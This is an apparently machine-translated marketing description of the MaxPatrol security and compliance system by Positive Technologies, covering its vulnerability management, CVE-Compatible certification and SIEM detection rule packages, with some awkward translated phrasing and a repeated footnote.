  • automated control of compliance of the security system with industry and international standards;
  • Automate vulnerability management, resource inventory, security policy compliance, and change control processes
  • Comprehensive analysis of complex systems, including Cisco network equipment, Windows, Linux, Unix, DBMSicrosoft SQL, Oracle, network applications, and proprietary web services
  • the ability to monitor the information system for compliance with corporate requirements and security policies.

Solutions based on MaxPatrol are delivered to medium and large organizations with more than 300 automated workplaces. In such companies, security analysis is a time-consuming set of measures. It includes an inventory of equipment, control of the composition of software and the relevance of its versions, analysis of data on network infrastructure nodes, monitoring vulnerabilities and risks of theft of confidential data, assessment of the security of web applications and the relevance of antivirus databases, control of network device configurations. All these measures are complicated by the need to comply with the requirements of corporate security policies, regulators, security standards, compare and agree on their norms.

Using solutions based on MaxPatrol, companies are moving from solving this set of tasks to system monitoring of security: they form consistent corporate security standards, automate the processes of inventory, change control, vulnerability management and compliance control, assess the effectiveness of IT and information security processes using established indicators. By automating many tasks, companies will be able to reduce the complexity of monitoring information security and reduce the operational costs of maintaining the required level of security of the IT infrastructure.

The main product of Positive Technologies - the MaxPatrol security and compliance control system - was officially certified in early 2012 by the non-profit MITRE corporation as CVE-Compatible. This means that MaxPatrol is recognized as CVE compatible and meets all the requirements of the creators of the standard.

The generally recognized classification of Common Vulnerabilities and Exposures (CVE) vulnerabilities allows information security market participants to speak the same language. Within the framework of this project, each vulnerability or threat is given a name and a brief description according to strictly defined rules.

Support for CVE identifiers opens up opportunities for information security experts to integrate MaxPatrol with other systems, and also allows you to substantively compare it in efficiency with similar products from other manufacturers - when used within the same information infrastructure - and assess the overall efficiency of their joint operation. Since 1999, the non-profit MITRE Corporation has maintained and developed a single CVE standard, replenishing the open base of vulnerabilities. This project was a response to the confusion that has long reigned in the field of information security, in which different manufacturers of information security content could have the same vulnerability with completely different names. Knowing the CVE identifier of a specific vulnerability and using any of the products with CVE-Compatible status, you can get information about this security issue. Since the standard's launch, the number of organizations supporting CVE has been growing rapidly; today there are more than 150 of them. A complete list of such organizations and their developments is presented on the official website of the standard.

Notes

  1. Knowledge base with a description of tactics, techniques and procedures for attacking attackers
  2. Delivery of examination packages to MaxPatrol SIEM is a regular automated transfer of knowledge in the field of information security incident detection in the form of algorithms that allow detecting even complex atypical attacks. The appropriate sets of rules and recommendations are formed by Positive Technologies (R&D and PT Expert Security Center) experts, who continuously analyze current threats, investigate the full cycle of attacks and develop ways to detect them. These sets are bundled and transferred to the Positive Technologies Knowledge Base, which is part of MaxPatrol SIEM. Then the user can select packages of interest in the PT KB interface and apply them as part of his product installation.
  3. Previous examination packages cover the tactics "Execution," "Protection Bypass," "Moving Within the Perimeter," "Commit" and "Getting Credentials."
  4. Delivery of examination packages to MaxPatrol SIEM is a regular automated transfer of knowledge in the field of incident detection INFORMATION SECURITY in the form algorithms that allows you to identify even complex non-typical ones. attacks Appropriate sets of rules and recommendations are formed by experts Positive Technologies (R&D and PT Expert Security Center) who continuously analyze current threats, investigate the full cycle of attacks and develop ways to detect them. Rule and recommendation sets are bundled and transferred to the Positive Technologies Knowledge Base (PT KB), which is part of MaxPatrol SIEM. Next, the system user can select the packages of interest in the PT KB interface and apply them as part of his product installation.: the added